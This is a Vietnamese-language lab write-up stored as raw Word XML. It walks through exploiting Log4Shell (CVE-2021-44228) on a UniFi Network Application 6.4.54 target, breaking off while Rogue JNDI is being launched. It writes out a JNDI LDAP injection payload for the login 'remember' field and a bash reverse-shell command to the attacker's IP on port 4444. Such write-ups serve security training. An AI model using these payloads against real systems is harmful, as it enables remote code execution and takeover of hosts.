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D59B94" w14:textId="097C8AA2" w:rsidR="00177CDF" w:rsidRDefault="00177CDF">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Trước tiên thực hiện chạy nmap với các option để thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="002D6386">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>quét bằng syn</w:t>
      </w:r>
      <w:r w:rsidR="001A356A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> không thực hiện ping</w:t>
      </w:r>
      <w:r w:rsidR="002D6386">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> để tìm kiếm các dịch vụ đang chạy trên cổng cùng với phiên bản của nó </w:t>
      </w:r>
      <w:r w:rsidR="001A356A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>và thông tin hệ điều hành của máy lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EF28E" w14:textId="216EC057" w:rsidR="0002152D" w:rsidRDefault="00DE209F">
      <w:r w:rsidRPr="00DE209F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B351854" wp14:editId="142950E9">
            <wp:extent cx="5731510" cy="2997835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13886958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695811" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2997835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000CC2B" w14:textId="4AF2D5FD" w:rsidR="001A356A" w:rsidRDefault="001A356A">
      <w:r>
        <w:t>Kết quả cho thấy có các cổng sau mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F9057" w14:textId="77777777" w:rsidR="001A356A" w:rsidRPr="001A356A" w:rsidRDefault="001A356A" w:rsidP="001A356A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A356A">
        <w:t>22/tcp mở OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; giao thức 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F915DDA" w14:textId="77777777" w:rsidR="001A356A" w:rsidRPr="001A356A" w:rsidRDefault="001A356A" w:rsidP="001A356A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A356A">
        <w:t>6789/tcp mở ibm-db2-admin?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA64F7" w14:textId="77777777" w:rsidR="001A356A" w:rsidRPr="001A356A" w:rsidRDefault="001A356A" w:rsidP="001A356A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A356A">
        <w:t>8080/tcp mở http-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D901972" w14:textId="77777777" w:rsidR="001A356A" w:rsidRPr="001A356A" w:rsidRDefault="001A356A" w:rsidP="001A356A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A356A">
        <w:t>8443/tcp mở ssl/nagios-nsca Nagios NSCA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2CE95B" w14:textId="77777777" w:rsidR="001A356A" w:rsidRPr="001A356A" w:rsidRDefault="001A356A" w:rsidP="001A356A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A356A">
        <w:t>8843/tcp mở ssl/không xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220111B7" w14:textId="77777777" w:rsidR="001A356A" w:rsidRPr="001A356A" w:rsidRDefault="001A356A" w:rsidP="001A356A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A356A">
        <w:t>8880/tcp mở cddbp-alt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AF601" w14:textId="730CC229" w:rsidR="00CB6281" w:rsidRDefault="00CB6281">
      <w:r>
        <w:t>Hệ điều Linux 5.0 – 5.14, MikroTik RouterOS 9.2 – 7.5 (Linux 5.6.3)</w:t>
      </w:r>
      <w:r w:rsidR="00BE1C05">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA2C27" w14:textId="7C1F2126" w:rsidR="00BE1C05" w:rsidRDefault="00BE1C05">
      <w:r>
        <w:t xml:space="preserve">Vì </w:t>
      </w:r>
      <w:r w:rsidR="00EB5CDF">
        <w:t>cổng 8080 đang mở http-proxy nên thực hiện truy cập vào nó trên trình duyệt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B07DBC8" w14:textId="583E95D9" w:rsidR="00A431B8" w:rsidRDefault="00A431B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74078E0E" wp14:editId="2D1D0917">
            <wp:extent cx="5731510" cy="2219325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="10828721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872186" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2219325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42855A57" w14:textId="19D9DB4B" w:rsidR="00EB5CDF" w:rsidRDefault="000C1173">
      <w:r w:rsidRPr="000C1173">
        <w:lastRenderedPageBreak/>
        <w:t>Sau khi truy cập địa chỉ IP mục tiêu qua trình duyệt, hệ thống đã thực hiện chuyển hướng sang cổng 8443, cho thấy dịch vụ đang sử dụng giao thức HTTPS. Tại đây, xuất hiện giao diện đăng nhập của UniFi Network Application, xác định được phiên bản đang chạy là 6.4.54.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B465907" w14:textId="71F92FED" w:rsidR="00A431B8" w:rsidRDefault="00A431B8">
      <w:r w:rsidRPr="00A431B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB08C35" wp14:editId="3D09622E">
            <wp:extent cx="5731510" cy="3221990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="740783539" name="Picture 1" descr="A screenshot of a computer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783539" name="Picture 1" descr="A screenshot of a computer login screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3221990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="588BF756" w14:textId="64C38ABD" w:rsidR="006A655A" w:rsidRPr="006A655A" w:rsidRDefault="006A655A" w:rsidP="006A655A">
      <w:r w:rsidRPr="006A655A">
        <w:t>Hệ thống đang chạy UniFi Network Application phiên bản 6.4.54, vốn bị ảnh hưởng bởi lỗ hổng nghiêm trọng CVE-2021-44228 (Log4Shell). Đây là lỗ hổng thực thi mã từ xa (RCE) trong thư viện Log4j, cho phép kẻ tấn công gửi payload độc hại để chiếm quyền điều khiển hệ thống.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vì vậy, thực hiện tìm kiếm lỗ hổng này trên google:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A13A6" w14:textId="77777777" w:rsidR="006757F0" w:rsidRDefault="006757F0"/>
    <w:p w14:paraId="62CC8930" w14:textId="16C0F3C8" w:rsidR="006757F0" w:rsidRDefault="006757F0">
      <w:r w:rsidRPr="006757F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0354ED37" wp14:editId="69BD98D0">
            <wp:extent cx="5731510" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4442949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294912" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2672715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F6DC50" w14:textId="266CDEE7" w:rsidR="006A655A" w:rsidRDefault="006A655A">
      <w:r>
        <w:t>Truy cập vào trang thông tin lỗ hổng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FDE9A" w14:textId="23D0E8EF" w:rsidR="00F57467" w:rsidRDefault="00F57467">
      <w:r w:rsidRPr="00F57467">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2084E46E" wp14:editId="0EE43D81">
            <wp:extent cx="5731510" cy="3578860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="15306783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678314" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3578860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C970D85" w14:textId="4B1FE50C" w:rsidR="00371B10" w:rsidRPr="00283B12" w:rsidRDefault="00371B10" w:rsidP="00283B12">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00283B12">
        <w:t xml:space="preserve">Trang web thông tin </w:t>
      </w:r>
      <w:r w:rsidR="00283B12" w:rsidRPr="00283B12">
        <w:t>cung cấp liên kết trực tiếp đến một repository GitHub chứa mã khai thác cho lỗ hổng này</w:t>
      </w:r>
      <w:r w:rsidRPr="00283B12">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00283B12" w:rsidRPr="00283B12">
        <w:t xml:space="preserve">Repository này tự động hóa quá trình khai thác lỗ hổng Log4Shell trên UniFi, cho phép kẻ tấn công dễ dàng thực thi mã từ xa. </w:t>
      </w:r>
      <w:r w:rsidRPr="00283B12">
        <w:t xml:space="preserve">Chỉ cần tải mã khai thác về và khởi chạy thì sẽ truy cập được shell của </w:t>
      </w:r>
      <w:r w:rsidR="00E87A8B" w:rsidRPr="00283B12">
        <w:t xml:space="preserve">hệ thống. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A865AE4" w14:textId="716F5F51" w:rsidR="003B0502" w:rsidRDefault="003B0502">
      <w:r w:rsidRPr="00292E57">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A88848" wp14:editId="7E5AC657">
            <wp:extent cx="5731510" cy="3176270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="5134456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445662" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3176270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A318A12" w14:textId="3CB60C26" w:rsidR="00283B12" w:rsidRDefault="00283B12">
      <w:r>
        <w:t>Ngoài ra, có thể thực hiện thủ công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA19F8C" w14:textId="743B0BA9" w:rsidR="00280B62" w:rsidRPr="003B0502" w:rsidRDefault="00D42828">
      <w:r>
        <w:t xml:space="preserve">Theo như thông tin được cung cấp, lỗ </w:t>
      </w:r>
      <w:r w:rsidR="008018D8">
        <w:t>hổng nằm ở giá trị remember trong yêu cầu đăng nhập</w:t>
      </w:r>
      <w:r w:rsidR="00687F6E">
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:r w:rsidR="00687F6E" w:rsidRPr="00687F6E">
        <w:t xml:space="preserve">hệ thống ghi log hoặc xử lý giá trị này bằng </w:t>
      </w:r>
      <w:r w:rsidR="00687F6E">
        <w:t>Log4j mà thiếu biện pháp bảo mật</w:t>
      </w:r>
      <w:r w:rsidR="008018D8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C44914" w14:textId="4443CEB9" w:rsidR="00AF4B7A" w:rsidRDefault="00AF4B7A">
      <w:r w:rsidRPr="00AF4B7A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785E56AF" wp14:editId="0168DBD2">
            <wp:extent cx="5731510" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="126616314"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16314" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2325370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594D813" w14:textId="38113784" w:rsidR="00687F6E" w:rsidRPr="00687F6E" w:rsidRDefault="001B4E6E">
      <w:r>
        <w:t xml:space="preserve">Để xác mình lỗ hổng có nằm ở giá trị này không, cần thực hiện gửi 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B4E6E">
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JNDI. Trước tiên, </w:t>
      </w:r>
      <w:r w:rsidR="001D3677">
        <w:t xml:space="preserve">xác định ip của máy tấn công để khi payload JNDI được gửi đi và được thực thi trên máy lab thì sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00560BC6" w:rsidRPr="00560BC6">
        <w:t xml:space="preserve">thực hiện truy vấn JNDI tới máy tấn </w:t>
      </w:r>
      <w:r w:rsidR="00560BC6">
        <w:t>công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86F7F4" w14:textId="6106CE3E" w:rsidR="0074603D" w:rsidRDefault="0074603D">
      <w:r w:rsidRPr="0074603D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D2305C0" wp14:editId="724C22CD">
            <wp:extent cx="5731510" cy="3641090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="199591555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915551" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3641090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5C6F8" w14:textId="7AE2D333" w:rsidR="00110871" w:rsidRPr="00110871" w:rsidRDefault="00EF5203" w:rsidP="00110871">
      <w:r>
        <w:t xml:space="preserve">Sau khi </w:t>
      </w:r>
      <w:r w:rsidR="00C04D46">
        <w:t xml:space="preserve">xác định được </w:t>
      </w:r>
      <w:r w:rsidR="00110871">
        <w:t xml:space="preserve">ip của máy tấn công, thực hiện gửi payload: </w:t>
      </w:r>
      <w:r w:rsidR="00110871" w:rsidRPr="00110871">
        <w:t>${jndi:ldap://</w:t>
      </w:r>
      <w:r w:rsidR="00110871">
        <w:t>10.10.14.48</w:t>
      </w:r>
      <w:r w:rsidR="00110871" w:rsidRPr="00110871">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00110871">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00110871" w:rsidRPr="00110871">
        <w:t>1389/o=tomcat}</w:t>
      </w:r>
      <w:r w:rsidR="00110871">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00996D1C">
        <w:t xml:space="preserve">để máy lab dùng </w:t>
      </w:r>
      <w:r w:rsidR="00996D1C" w:rsidRPr="00996D1C">
        <w:t>Log4j thực hiện tra cứu JNDI</w:t>
      </w:r>
      <w:r w:rsidR="00996D1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00996D1C" w:rsidRPr="00996D1C">
        <w:t xml:space="preserve">thực hiện kết nối đến địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="00682C31">
        <w:t>đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58020EC4" w14:textId="4F9F1692" w:rsidR="00EF5203" w:rsidRPr="00EF5203" w:rsidRDefault="00EF5203"/>
    <w:p w14:paraId="48C6222F" w14:textId="70579A33" w:rsidR="0074603D" w:rsidRDefault="0074603D">
      <w:r w:rsidRPr="0074603D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC3844C" wp14:editId="78A23BC9">
            <wp:extent cx="5731510" cy="2483485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4406572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657278" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2483485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257A5D0" w14:textId="2592AF8F" w:rsidR="00682C31" w:rsidRPr="00682C31" w:rsidRDefault="00682C31">
      <w:r>
        <w:t xml:space="preserve">Sử dụng công cụ tcpdump để </w:t>
      </w:r>
      <w:r w:rsidR="00F1286A">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00F1286A" w:rsidRPr="00F1286A">
        <w:t>iểm tra xem có gói tin đến từ IP mục tiêu hay không</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F1286A">
        <w:t xml:space="preserve">và gửi </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">yêu cầu chứa </w:t>
      </w:r>
      <w:r w:rsidR="00F1286A">
        <w:t>payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F1F23" w14:textId="0463B906" w:rsidR="00645AD9" w:rsidRDefault="00645AD9">
      <w:r w:rsidRPr="00645AD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00BDD734" wp14:editId="7AA6BA4C">
            <wp:extent cx="5731510" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="469277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2779" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="716280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="331552C9" w14:textId="697751EF" w:rsidR="009B2CC8" w:rsidRDefault="009B2CC8">
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy đã có gói tin được gửi đến từ ip của mục </w:t>
      </w:r>
      <w:r w:rsidR="009C03B9">
        <w:t>tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E263169" w14:textId="08DBF415" w:rsidR="009C03B9" w:rsidRDefault="009C03B9">
      <w:r>
        <w:t xml:space="preserve">Sau đó sử dụng Rogue JNDI để </w:t>
      </w:r>
      <w:r w:rsidRPr="009C03B9">
        <w:t xml:space="preserve">tạo một máy chủ giả mạo để phục vụ payload </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JNDI. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798C574D" w14:textId="79FC4C0A" w:rsidR="00292E57" w:rsidRDefault="003B0502">
      <w:r w:rsidRPr="003B0502">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFE23B3" wp14:editId="62F2705C">
            <wp:extent cx="5731510" cy="3133090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="938406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40647" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3133090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F8C951" w14:textId="481DC9E7" w:rsidR="00141D29" w:rsidRDefault="00141D29">
      <w:r>
        <w:t>Thực hiện tải về và đóng gói thành file jar để có thể khởi chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993EEFB" w14:textId="7D8649DB" w:rsidR="000E27EA" w:rsidRDefault="000E27EA">
      <w:r w:rsidRPr="000E27EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23CC4857" wp14:editId="765A41CE">
            <wp:extent cx="5731510" cy="1420495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="149413663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136634" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1420495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A980A" w14:textId="1AEDB5F6" w:rsidR="00141D29" w:rsidRDefault="005123B6">
      <w:r>
        <w:t>Tiếp đó tạo 1 payload reverse shell rồi sau đó mã hóa base64 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5196F">
        <w:t>echo 'bash -c bash -i &gt;&amp;/dev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5196F">
        <w:t>/tcp/10.10.14.48/4444 0&gt;&amp;1' | base64</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ECBE94" w14:textId="5F459A32" w:rsidR="00D5196F" w:rsidRDefault="00837162" w:rsidP="005123B6">
      <w:r w:rsidRPr="00837162">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07B7601C" wp14:editId="07757C1A">
            <wp:extent cx="5731510" cy="556846"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="715545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545266" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="12308"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="556846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E4D0D8" w14:textId="679B76CB" w:rsidR="008B4981" w:rsidRDefault="00941AA9" w:rsidP="005123B6">
      <w:r>
        <w:t xml:space="preserve">Sau đó thực hiện chạy RogueJndi </w:t>
      </w:r>
      <w:r w:rsidR="00744A43">
        <w:t xml:space="preserve">tạo một </w:t>
      </w:r>
      <w:r w:rsidR="00F42BCB">
        <w:t xml:space="preserve">máy </w:t>
      </w:r>
